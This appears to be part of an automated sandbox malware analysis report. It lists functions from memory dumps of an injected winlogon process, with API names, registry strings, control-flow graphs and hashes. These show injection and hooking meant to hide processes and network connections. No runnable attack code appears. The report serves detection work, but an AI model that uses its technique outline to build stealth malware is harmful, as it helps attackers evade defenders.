                                                                                Function 000001E858981628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: 21d86d412d1650ae27b0043b2d401094e46d8c624b6cd0b43ec9435d42789ffa
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: 2D710A36321A91C6EB10AF66E8916EDB3A5FF84B98F401132DE4E57B69EF38C454C740
                                                                                Function 000001E858983790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: d234e4461be7ce666b4697da3425b0a366aa51e2e4cc7be98c343ce9cae75724
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: 05115B36724BC1C2EF159B22E4086ADB2A1FB88B85F44003ADE8E07794EF3DC505CB04
                                                                                Function 000001E858985B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 59 1e858985b30-1e858985b57 60 1e858985b59-1e858985b68 59->60 61 1e858985b6b-1e858985b76 GetCurrentThreadId 59->61 60->61 62 1e858985b82-1e858985b89 61->62 63 1e858985b78-1e858985b7d 61->63 65 1e858985b9b-1e858985baf 62->65 66 1e858985b8b-1e858985b96 call 1e858985960 62->66 64 1e858985faf-1e858985fc6 call 1e858987940 63->64 69 1e858985bbe-1e858985bc4 65->69 66->64 72 1e858985c95-1e858985cb6 69->72 73 1e858985bca-1e858985bd3 69->73 77 1e858985cbc-1e858985cdc GetThreadContext 72->77 78 1e858985e1f-1e858985e30 call 1e8589874bf 72->78 75 1e858985bd5-1e858985c18 call 1e8589885c0 73->75 76 1e858985c1a-1e858985c8d call 1e858984510 call 1e8589844b0 call 1e858984470 73->76 88 1e858985c90 75->88 76->88 81 1e858985ce2-1e858985d03 77->81 82 1e858985e1a 77->82 92 1e858985e35-1e858985e3b 78->92 81->82 90 1e858985d09-1e858985d12 81->90 82->78 88->69 95 1e858985d92-1e858985da3 90->95 96 1e858985d14-1e858985d25 90->96 97 1e858985e41-1e858985e98 VirtualProtect FlushInstructionCache 92->97 98 1e858985efe-1e858985f0e 92->98 106 1e858985e15 95->106 107 1e858985da5-1e858985dc3 95->107 102 1e858985d27-1e858985d3c 96->102 103 1e858985d8d 96->103 104 1e858985ec9-1e858985ef9 call 1e8589878ac 97->104 105 1e858985e9a-1e858985ea4 97->105 100 1e858985f10-1e858985f17 98->100 101 1e858985f1e-1e858985f2a call 1e858984df0 98->101 100->101 110 1e858985f19 call 1e8589843e0 100->110 122 1e858985f2f-1e858985f35 101->122 102->103 111 1e858985d3e-1e858985d88 call 1e858983970 SetThreadContext 102->111 103->106 104->92 105->104 113 1e858985ea6-1e858985ec1 call 1e858984390 105->113 107->106 109 1e858985dc5-1e858985e0c call 1e858983900 107->109 109->106 124 1e858985e10 call 1e8589874dd 109->124 110->101 111->103 113->104 125 1e858985f77-1e858985f95 122->125 126 1e858985f37-1e858985f75 ResumeThread call 1e8589878ac 122->126 124->106 128 1e858985f97-1e858985fa6 125->128 129 1e858985fa9 125->129 126->122 128->129 129->64
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                                • Instruction ID: a4617b46cd32b3a0414ab7f2d2c5e1ab313b6a71b2cba704dad36ec99b28e09a
                                                                                • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                                • Instruction Fuzzy Hash: 9DD17776214B89C6DB709B56E49439EB7A0FB88B84F500126EE8D47BA9DF3CC545CF40
                                                                                Function 000001E8589850D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 131 1e8589850d0-1e8589850fc 132 1e85898510d-1e858985116 131->132 133 1e8589850fe-1e858985106 131->133 134 1e858985127-1e858985130 132->134 135 1e858985118-1e858985120 132->135 133->132 136 1e858985141-1e85898514a 134->136 137 1e858985132-1e85898513a 134->137 135->134 138 1e858985156-1e858985161 GetCurrentThreadId 136->138 139 1e85898514c-1e858985151 136->139 137->136 141 1e858985163-1e858985168 138->141 142 1e85898516d-1e858985174 138->142 140 1e8589856d3-1e8589856da 139->140 141->140 143 1e858985181-1e85898518a 142->143 144 1e858985176-1e85898517c 142->144 145 1e858985196-1e8589851a2 143->145 146 1e85898518c-1e858985191 143->146 144->140 147 1e8589851a4-1e8589851c9 145->147 148 1e8589851ce-1e858985225 call 1e8589856e0 * 2 145->148 146->140 147->140 153 1e858985227-1e85898522e 148->153 154 1e85898523a-1e858985243 148->154 155 1e858985230 153->155 156 1e858985236 153->156 157 1e858985255-1e85898525e 154->157 158 1e858985245-1e858985252 154->158 159 1e8589852b0-1e8589852b6 155->159 160 1e8589852a6-1e8589852aa 156->160 161 1e858985260-1e858985270 157->161 162 1e858985273-1e858985298 call 1e858987870 157->162 158->157 163 1e8589852e5-1e8589852eb 159->163 164 1e8589852b8-1e8589852d4 call 1e858984390 159->164 160->159 161->162 172 1e85898532d-1e858985342 call 1e858983cc0 162->172 173 1e85898529e 162->173 167 1e858985315-1e858985328 163->167 168 1e8589852ed-1e85898530c call 1e8589878ac 163->168 164->163 174 1e8589852d6-1e8589852de 164->174 167->140 168->167 178 1e858985351-1e85898535a 172->178 179 1e858985344-1e85898534c 172->179 173->160 174->163 180 1e85898536c-1e8589853ba call 1e858988c60 178->180 181 1e85898535c-1e858985369 178->181 179->160 184 1e8589853c2-1e8589853ca 180->184 181->180 185 1e8589853d0-1e8589854bb call 1e858987440 184->185 186 1e8589854d7-1e8589854df 184->186 198 1e8589854bd 185->198 199 1e8589854bf-1e8589854ce call 1e858984060 185->199 188 1e8589854e1-1e8589854f4 call 1e858984590 186->188 189 1e858985523-1e85898552b 186->189 200 1e8589854f6 188->200 201 1e8589854f8-1e858985521 188->201 190 1e858985537-1e858985546 189->190 191 1e85898552d-1e858985535 189->191 196 1e858985548 190->196 197 1e85898554f 190->197 191->190 195 1e858985554-1e858985561 191->195 203 1e858985563 195->203 204 1e858985564-1e8589855b9 call 1e8589885c0 195->204 196->197 197->195 198->186 207 1e8589854d0 199->207 208 1e8589854d2 199->208 200->189 201->186 203->204 210 1e8589855c8-1e858985661 call 1e858984510 call 1e858984470 VirtualProtect 204->210 211 1e8589855bb-1e8589855c3 204->211 207->186 208->184 216 1e858985671-1e8589856d1 210->216 217 1e858985663-1e858985668 GetLastError 210->217 216->140 217->216
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                                • Instruction ID: fa7807662b3792369c97fc6f37bebb2b001074cd7c6065ce50333d33d1213250
                                                                                • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                                • Instruction Fuzzy Hash: 11029436229BC5C6EB60CB59E49079EB7A1F785794F104026EA8E87BA9DF7CC454CF00
                                                                                Function 000001E8589839E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$AllocQuery
                                                                                • String ID:
                                                                                • API String ID: 31662377-0
                                                                                • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                • Instruction ID: 5ad133b89d074dd97bec0c1f73fb02c24c1f243091b434175b3c7d6c02ead25a
                                                                                • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                • Instruction Fuzzy Hash: E531EC32239AC5C1EA70DA15E85539EF6A4FB88784F500536EACE46BA8DF7DC5809F04
                                                                                Function 000001E85898328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: 9367effade6da1e612e9811c82477e14b03a08a888ac1948d4cbee7ffa7af72d
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: F41152716346C2C2FB60AB62F8493DDF294BF54385F90413FAD4E82995EF7CC0849A10
                                                                                Function 000001E858984DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 3733156554-0
                                                                                • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                                • Instruction ID: 5a9e8cf37d9f90f00b28642c3c3ed99c7679eb8f6b8d0d5ae9ec7e4d6c0d13b2
                                                                                • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                                • Instruction Fuzzy Hash: DFF01D76228B85C1D630DB51E44038EBBA0FB887D4F140122BE8D43B69CE3CC5808F00
                                                                                Function 000001E85895273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 265 1e85895273c-1e8589527a4 call 1e8589529d4 * 4 274 1e8589527aa-1e8589527ad 265->274 275 1e8589529b2 265->275 274->275 276 1e8589527b3-1e8589527b6 274->276 277 1e8589529b4-1e8589529d0 275->277 276->275 278 1e8589527bc-1e8589527bf 276->278 278->275 279 1e8589527c5-1e8589527e6 VirtualAlloc 278->279 279->275 280 1e8589527ec-1e85895280c 279->280 281 1e85895280e-1e858952836 280->281 282 1e858952838-1e85895283f 280->282 281->281 281->282 283 1e8589528df-1e8589528e6 282->283 284 1e858952845-1e858952852 282->284 285 1e8589528ec-1e858952901 283->285 286 1e858952992-1e8589529b0 283->286 284->283 287 1e858952858-1e85895286a LoadLibraryA 284->287 285->286 288 1e858952907 285->288 286->277 289 1e85895286c-1e858952878 287->289 290 1e8589528ca-1e8589528d2 287->290 293 1e85895290d-1e858952921 288->293 294 1e8589528c5-1e8589528c8 289->294 290->287 291 1e8589528d4-1e8589528d9 290->291 291->283 296 1e858952923-1e858952934 293->296 297 1e858952982-1e85895298c 293->297 294->290 295 1e85895287a-1e85895287d 294->295 301 1e85895287f-1e8589528a5 295->301 302 1e8589528a7-1e8589528b7 295->302 299 1e85895293f-1e858952943 296->299 300 1e858952936-1e85895293d 296->300 297->286 297->293 304 1e85895294d-1e858952951 299->304 305 1e858952945-1e85895294b 299->305 303 1e858952970-1e858952980 300->303 306 1e8589528ba-1e8589528c1 301->306 302->306 303->296 303->297 308 1e858952963-1e858952967 304->308 309 1e858952953-1e858952961 304->309 305->303 306->294 308->303 310 1e858952969-1e85895296c 308->310 309->303 310->303
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: AllocLibraryLoadVirtual
                                                                                • String ID:
                                                                                • API String ID: 3550616410-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: 664efa2306450b3d651c980b7901db96b5cccce9d6076fff7dea8f6b8d110b4a
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: 3261CC72B21690C7DA548F95D1207ADF3A2FF54BA5F588132DE5D07788DE38D852C700
                                                                                Function 000001E858981ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 000001E858981628: GetProcessHeap.KERNEL32 ref: 000001E858981633
                                                                                  • Part of subcall function 000001E858981628: HeapAlloc.KERNEL32 ref: 000001E858981642
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589816B2
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589816DF
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589816F9
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981719
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981734
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981754
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E85898176F
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E85898178F
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589817AA
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589817CA
                                                                                • Sleep.KERNEL32 ref: 000001E858981AD7
                                                                                • SleepEx.KERNELBASE ref: 000001E858981ADD
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589817E5
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981805
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981820
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981840
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E85898185B
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E85898187B
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981896
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589818A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: 4bfe8da4bf64d09d75688e0bc86698689cfa1098149370d4ad6d534f2979ed62
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: D7317771231AC2D6EB50BB26DA513FDF3A9AF84BD0F0454339E0D87699FE24C8918A10
                                                                                Function 000001E8589B273C Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 350 1e8589b273c-1e8589b27a4 call 1e8589b29d4 * 4 359 1e8589b29b2 350->359 360 1e8589b27aa-1e8589b27ad 350->360 362 1e8589b29b4-1e8589b29d0 359->362 360->359 361 1e8589b27b3-1e8589b27b6 360->361 361->359 363 1e8589b27bc-1e8589b27bf 361->363 363->359 364 1e8589b27c5-1e8589b27e6 VirtualAlloc 363->364 364->359 365 1e8589b27ec-1e8589b280c 364->365 366 1e8589b2838-1e8589b283f 365->366 367 1e8589b280e-1e8589b2836 365->367 368 1e8589b2845-1e8589b2852 366->368 369 1e8589b28df-1e8589b28e6 366->369 367->366 367->367 368->369 372 1e8589b2858-1e8589b286a 368->372 370 1e8589b2992-1e8589b29b0 369->370 371 1e8589b28ec-1e8589b2901 369->371 370->362 371->370 373 1e8589b2907 371->373 379 1e8589b28ca-1e8589b28d2 372->379 380 1e8589b286c-1e8589b2878 372->380 375 1e8589b290d-1e8589b2921 373->375 377 1e8589b2923-1e8589b2934 375->377 378 1e8589b2982-1e8589b298c 375->378 383 1e8589b2936-1e8589b293d 377->383 384 1e8589b293f-1e8589b2943 377->384 378->370 378->375 379->372 381 1e8589b28d4-1e8589b28d9 379->381 385 1e8589b28c5-1e8589b28c8 380->385 381->369 387 1e8589b2970-1e8589b2980 383->387 388 1e8589b2945-1e8589b294b 384->388 389 1e8589b294d-1e8589b2951 384->389 385->379 386 1e8589b287a-1e8589b287d 385->386 390 1e8589b28a7-1e8589b28b7 386->390 391 1e8589b287f-1e8589b28a5 386->391 387->377 387->378 388->387 392 1e8589b2963-1e8589b2967 389->392 393 1e8589b2953-1e8589b2961 389->393 395 1e8589b28ba-1e8589b28c1 390->395 391->395 392->387 394 1e8589b2969-1e8589b296c 392->394 393->387 394->387 395->385
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: c921608bc3ed8dae174af04d789195309c5edfcc0c714fa749226a5546365456
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: 7161DD32B29690CBEB548F95D1007ADF3A2FB54BA5F588136DE5D07788DE38D852C700

                                                                                Non-executed Functions

                                                                                Function 000001E858982B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction ID: 04a661148b50104311287319c74e3cfe1c909468e327bc71e4abbcab7385a8c3
                                                                                • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction Fuzzy Hash: A6B15476220AD2C6EB699FA5D8407EDF3A5FB84B84F445027EE0D57B95EE35C880CB40
                                                                                Function 000001E858987D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: c25654e1fbf133ad71a07c6f0efe47fc9d8043adbf42997a59493c9db71f9faa
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: 41313B76225BC1DAEB609F60E8807EDB365FB84744F44442ADA4E57B99EF38C648CB10
                                                                                Function 000001E85898D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: 0fd8bee66b9aa75a719588d4164310d191915e835c40ed0449f42a8a8d7cafff
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: A5313D36224BC1D6EB60DB25E8403EEB3A4FB89754F500126EE9D53B59DF38C555CB00
                                                                                Function 000001E858987960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: 34985af1e6a69c2e887ac8394de09c6f631af6656f7e96728bd996360b5e390c
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: 7D111C36720F91C9EB109B60E8553AD73A4FB19758F440E32DE6E467A4DF78D1988380
                                                                                Function 000001E85898DCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                • Instruction ID: 30bb9f7e9d87a9d9c65bc2380062ff3bad17e1f141d89e57fb0a08f8465aebfb
                                                                                • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                • Instruction Fuzzy Hash: C551B5327246D1D9FB209B72E8407EEBBA5FB84794F144126EE9D67B95DE38C501CB00
                                                                                Function 000001E8589636F0 Relevance: .0, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                                • Instruction ID: 1e72e37fc9f235eb4f944ff72101e8db7dacc5524e3e801771df4715c73e88ad
                                                                                • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                                • Instruction Fuzzy Hash: 1BF0F4716356948EDB988F69E443759B7A1F748384FD0812ADA8EC3A14DB3C8455CF14
                                                                                Function 000001E8589812BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction ID: c2281e23739868d66036d4294d6c0683aafed4b8ecad6af3162b140505f798a1
                                                                                • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction Fuzzy Hash: 4E512B36224BC5C6EB65DF62E54439EB7A2FB89BD9F044126DE4A07768EF38C0458B00
                                                                                Function 000001E858981D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
